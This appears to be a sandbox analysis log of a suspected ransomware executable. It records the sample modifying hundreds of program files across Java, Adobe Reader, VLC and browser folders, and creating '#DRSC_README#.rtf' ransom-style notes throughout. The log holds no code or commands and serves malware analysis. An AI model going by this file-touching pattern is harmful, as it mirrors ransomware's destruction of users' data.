Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Indianapolis 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-ui.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Caracas 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ar.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Scoresbysund 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STP 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tripoli 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Marquesas 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\it.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm_export.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Creston 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\LINEAR_RGB.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Detroit 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rio_Branco 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Anchorage 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository_1.2.100.v20131209-2144.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-output2.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyclient.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-14 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\preface.htm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cambridge_Bay 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\tnameserv.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\La_Rioja 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\84.0.4147.89.manifest 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansDemiBold.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Goose_Bay 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightRegular.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\es-419.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zurich 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tunis 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\java.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Adak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Azores 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-heapwalker.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbynet.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-api.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Choibalsan 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\New_York 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Dublin 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Majuro 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Edmonton 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Galapagos 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jawt.lib 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\La_Rioja 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Cordoba 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\v8_context_snapshot.bin 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Lagos 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Khartoum 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_TW.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bangkok 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-6 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Casablanca 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\psfont.properties.ja 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Casey 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santarem 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tongatapu 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\DumontDUrville 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtobe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands_3.6.100.v20140528-1422.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Algiers 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterBold.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_win7.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Gambier 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\weblink.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Scoresbysund 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations_2.4.0.v20131119-0908.jar 